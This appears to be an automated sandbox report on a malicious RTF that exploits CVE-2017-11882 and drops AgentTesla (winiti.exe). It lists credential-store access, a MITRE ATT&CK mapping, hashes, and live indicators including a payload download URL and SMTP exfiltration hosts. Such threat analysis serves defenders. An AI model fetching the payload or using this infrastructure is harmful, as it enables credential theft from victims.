Source: C:\Users\user\AppData\Roaming\winiti.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 5.2.winiti.exe.34c5b90.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.winiti.exe.3489570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.winiti.exe.34c5b90.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.winiti.exe.3489570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.714490437.0000000002280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: winiti.exe PID: 3392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: winiti.exe PID: 3468, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 5.2.winiti.exe.34c5b90.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.winiti.exe.3489570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.winiti.exe.34c5b90.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.winiti.exe.3489570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: winiti.exe PID: 3392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: winiti.exe PID: 3468, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	1 Query Registry	Distributed Component Object Model	1 Input Capture	33 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	141 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	111 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2FBexXRCHR.rtf	53%	Virustotal		Browse
2FBexXRCHR.rtf	47%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882
2FBexXRCHR.rtf	100%	Avira	HEUR/Rtf.Malformed

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\winiti.exe	100%	Avira	HEUR/AGEN.1308749
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe	100%	Avira	HEUR/AGEN.1308749
C:\Users\user\AppData\Roaming\winiti.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
us2.smtp.mailhostbox.com	1%	Virustotal	Browse
api.ipify.org	0%	Virustotal	Browse
smtp.jlahuachem.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://api.ipify.org/	0%	URL Reputation	safe
https://api.ipify.org/	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://api.ipify.org/t	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	Avira URL Cloud	safe
http://tempuri.org/dxsss.xsd	0%	Avira URL Cloud	safe
http://us2.smtp.mailhostbox.com	0%	Avira URL Cloud	safe
https://support.google.com/chrome/?p=plugin_flash	0%	Avira URL Cloud	safe
http://198.46.174.139/71/winiti.exej	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Avira URL Cloud	safe
http://smtp.jlahuachem.com	0%	Avira URL Cloud	safe
http://us2.smtp.mailhostbox.com	1%	Virustotal		Browse
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	Virustotal		Browse
http://198.46.174.139/71/winiti.exe	0%	Avira URL Cloud	safe
http://198.46.174.139/71/winiti.	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Virustotal		Browse
http://smtp.jlahuachem.com	0%	Virustotal		Browse
http://198.46.174.139/71/winiti.exekkC:	0%	Avira URL Cloud	safe
http://tempuri.org/dxsss.xsd	1%	Virustotal		Browse
https://support.google.com/chrome/?p=plugin_flash	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.199.224	true	false	1%, Virustotal, Browse	unknown
api.ipify.org	172.67.74.152	true	false	0%, Virustotal, Browse	unknown
smtp.jlahuachem.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe URL Reputation: safe	unknown
http://198.46.174.139/71/winiti.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	winiti.exe, 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/dxsss.xsd	winiti.exe.2.dr, winiti[1].exe.2.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://account.dyn.com/	winiti.exe, 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://us2.smtp.mailhostbox.com	winiti.exe, 00000006.00000002.714490437.0000000002358000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	winiti.exe, 00000006.00000002.714490437.0000000002280000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://198.46.174.139/71/winiti.exej	EQNEDT32.EXE, 00000002.00000002.363861169.00000000002EF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://smtp.jlahuachem.com	winiti.exe, 00000006.00000002.714490437.0000000002358000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org/t	winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net0D	winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://198.46.174.139/71/winiti.	EQNEDT32.EXE, 00000002.00000002.363861169.000000000032B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://198.46.174.139/71/winiti.exekkC:	EQNEDT32.EXE, 00000002.00000002.363861169.00000000002EF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.91.198.143	unknown	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
208.91.199.225	unknown	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
198.46.174.139	unknown	United States	36352	AS-COLOCROSSINGUS	true
208.91.199.223	unknown	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
208.91.199.224	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482785
Start date and time:	2024-07-26 06:38:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2FBexXRCHR.rtf renamed because original name is a hash value
Original Sample Name:	02e73ef6a6bde5caa7628ee916111f60.rtf
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winRTF@7/9@4/6
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 95% Number of executed functions: 125 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .rtf Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer Override analysis time to 78981.3340972191 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
Execution Graph export aborted for target EQNEDT32.EXE, PID 3244 because there are no executed function
Execution Graph export aborted for target winiti.exe, PID 3468 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:39:05	API Interceptor	307x Sleep call for process: EQNEDT32.EXE modified
00:39:08	API Interceptor	532708x Sleep call for process: winiti.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.91.198.143	file.exe	Get hash	malicious	SystemBC	Browse
	file.exe	Get hash	malicious	SystemBC	Browse
	LisectAVT_2403002A_52.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exe	Get hash	malicious	AgentTesla	Browse
	8hOkq9mMQu.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Order List Pdf.exe	Get hash	malicious	AgentTesla	Browse
	payment order.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Mt103.exe	Get hash	malicious	AgentTesla	Browse
	PO-070724-WA00002.exe	Get hash	malicious	AgentTesla	Browse
	Swift Copy_98754.bat.exe	Get hash	malicious	AgentTesla	Browse
208.91.199.225	LisectAVT_2403002A_124.exe	Get hash	malicious	AgentTesla	Browse
	jRlq1fSUW5.exe	Get hash	malicious	AgentTesla	Browse
	IEnetcache.hta	Get hash	malicious	Cobalt Strike, AgentTesla, PureLog Stealer	Browse
	winiti.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	0RA0ngi2c2.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	z1X3Z1ohoefF078ij.exe	Get hash	malicious	AgentTesla	Browse
	Products and Quote.exe	Get hash	malicious	AgentTesla	Browse
	Purchase Order.exe	Get hash	malicious	AgentTesla	Browse
	ATTACHMENT OF PAYMENT.exe	Get hash	malicious	AgentTesla	Browse
	Luciana Alvarez CV.exe	Get hash	malicious	AgentTesla	Browse
198.46.174.139	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	198.46.174.139/41/winiti.exe
	M6hS9qGbFx.rtf	Get hash	malicious	AgentTesla	Browse	198.46.174.139/42/winiti.exe
	INV 66077.xls	Get hash	malicious	AgentTesla	Browse	198.46.174.139/66077/winiti.exe
	cz2afaNerh.rtf	Get hash	malicious	AgentTesla	Browse	198.46.174.139/66077/winiti.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
us2.smtp.mailhostbox.com	file.exe	Get hash	malicious	SystemBC	Browse	208.91.199.224
	file.exe	Get hash	malicious	SystemBC	Browse	208.91.199.223
	LisectAVT_2403002A_124.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	LisectAVT_2403002A_52.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	SWIFT COPY.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	LisectAVT_2403002B_465.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	jRlq1fSUW5.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	LCWGT83qLa.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	IEnetcache.hta	Get hash	malicious	Cobalt Strike, AgentTesla, PureLog Stealer	Browse	208.91.199.225
api.ipify.org	https://pub-bc1e99c17d21413c8c62ead228907d1f.r2.dev/auth_gen.html?folder=inf0gudkij&module&user-agent=Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.75+Safari/537.36	Get hash	malicious	Greatness Phishing Kit, HTMLPhisher	Browse	104.26.13.205
	https://b14d.lnsd.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	LisectAVT_2403002A_124.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	LisectAVT_2403002A_127.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	LisectAVT_2403002A_133.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	LisectAVT_2403002A_2.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	LisectAVT_2403002A_460.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	LisectAVT_2403002A_481.exe	Get hash	malicious	Luna Grabber, Luna Logger	Browse	104.26.12.205
	LisectAVT_2403002A_63.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	LisectAVT_2403002A_59.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	file.exe	Get hash	malicious	SystemBC	Browse	103.50.162.156
	file.exe	Get hash	malicious	SystemBC	Browse	103.50.162.156
	LisectAVT_2403002A_124.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	LisectAVT_2403002A_16.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	LisectAVT_2403002A_52.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	SWIFT COPY.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	LisectAVT_2403002B_290.exe	Get hash	malicious	Bdaejec	Browse	74.119.239.234
	LisectAVT_2403002B_465.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	jRlq1fSUW5.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS	file.exe	Get hash	malicious	SystemBC	Browse	103.50.162.156
	file.exe	Get hash	malicious	SystemBC	Browse	103.50.162.156
	LisectAVT_2403002A_124.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	LisectAVT_2403002A_16.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	LisectAVT_2403002A_52.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	SWIFT COPY.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	LisectAVT_2403002B_290.exe	Get hash	malicious	Bdaejec	Browse	74.119.239.234
	LisectAVT_2403002B_465.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	jRlq1fSUW5.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS	file.exe	Get hash	malicious	SystemBC	Browse	103.50.162.156
	file.exe	Get hash	malicious	SystemBC	Browse	103.50.162.156
	LisectAVT_2403002A_124.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	LisectAVT_2403002A_16.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	LisectAVT_2403002A_52.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	SWIFT COPY.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	LisectAVT_2403002B_290.exe	Get hash	malicious	Bdaejec	Browse	74.119.239.234
	LisectAVT_2403002B_465.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	jRlq1fSUW5.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
AS-COLOCROSSINGUS	DBytisGNuD.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	107.174.69.116
	LisectAVT_2403002A_101.exe	Get hash	malicious	Remcos	Browse	107.175.229.139
	LisectAVT_2403002A_111.exe	Get hash	malicious	Trickbot	Browse	108.174.60.238
	042240724.xls	Get hash	malicious	Remcos	Browse	198.46.176.133
	LisectAVT_2403002A_407.exe	Get hash	malicious	Remcos	Browse	107.175.229.139
	LisectAVT_2403002A_431.exe	Get hash	malicious	Remcos	Browse	107.175.229.139
	createdgoodthingswtihmewhilealot.gif.vbs	Get hash	malicious	Unknown	Browse	198.46.176.133
	greatbunfeelsoftandhoney.gif.vbs	Get hash	malicious	Unknown	Browse	198.46.176.133
	LisectAVT_2403002B_38.exe	Get hash	malicious	Sality	Browse	107.172.18.180
	PO S0042328241130.xls	Get hash	malicious	Remcos	Browse	198.46.176.133

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
36f7277af969a6947a61ae0b815907a1	042240724.xls	Get hash	malicious	Remcos	Browse	172.67.74.152
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	S004232824113048.xls	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.74.152
	M6hS9qGbFx.rtf	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	DRWG-347RB1.pd.xls	Get hash	malicious	Unknown	Browse	172.67.74.152
	Purchase Order - P04737.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	INV 66077.xls	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	DRWG-347RB1.pd.xls	Get hash	malicious	FormBook	Browse	172.67.74.152
	cz2afaNerh.rtf	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	R6UcgOy5nE.rtf	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	671744
Entropy (8bit):	7.848719392804634
Encrypted:	false
SSDEEP:	12288:6ChcU7r3FL0YtcCCvLLgov4CnDUOt7TDM2DG0oSb3fqEVzXfmhujHeis3c:Jco3FYYtajLX4stTA2DGbSeEUh+ei8c
MD5:	3D33CBDE84D0A1197EC0D459D634473E
SHA1:	ABD0074C5B2EED8FBAB4D30443CEAC4B403AD09D
SHA-256:	33647CF1D7BA05386D44A608A94979925883F8E8C0E5F63B3F2E7FFDC7380461
SHA-512:	36F31309DDDF020FD9FEE7C44D8847924C4F8A9306A7F04DFA15FD2B73645C982F98D4B7A616B2B31D4B3C14510F2858608BEDA519EB8475780B544A4EEDCEA1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0......@......B.... ........@.. ... ...................@... ........@.....................................O............................ ....................................................... ............... ..H............text...H.... ....... .............. ..`.rsrc............ ..................@..@.reloc....... ... ... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{87E6EBAC-0849-42D8-978B-492A9A003210}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	CE338FE6899778AACFC28414F2D9498B
SHA1:	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:	6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A35E5ED9-2E36-4F95-9E06-B99263E8CEA4}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	3.5588481165085604
Encrypted:	false
SSDEEP:	384:9pdVrvoJS3ISfCDpChMrYTwnqyEepBqsh:9jVrDYvVKMrYTwJBRh
MD5:	FC30B68C73F56E933FF1BBA16C7D373E
SHA1:	D49565EA429F49F648A6EBD7467C984EC11AF7E2
SHA-256:	E01B02CE5304781F4F609B55EC49D38DC743D1414E23D7C49DAEDDC124DF7AAA
SHA-512:	02A684F516FCD72E58A40EBD32447BA74A6F4380248E6A7BA163E9B8B1E73E7E9BBF6864AF9C9B354F0447539BDA8521303D2D62F011E2033F13F9A1A2FBD91F
Malicious:	false
Reputation:	low
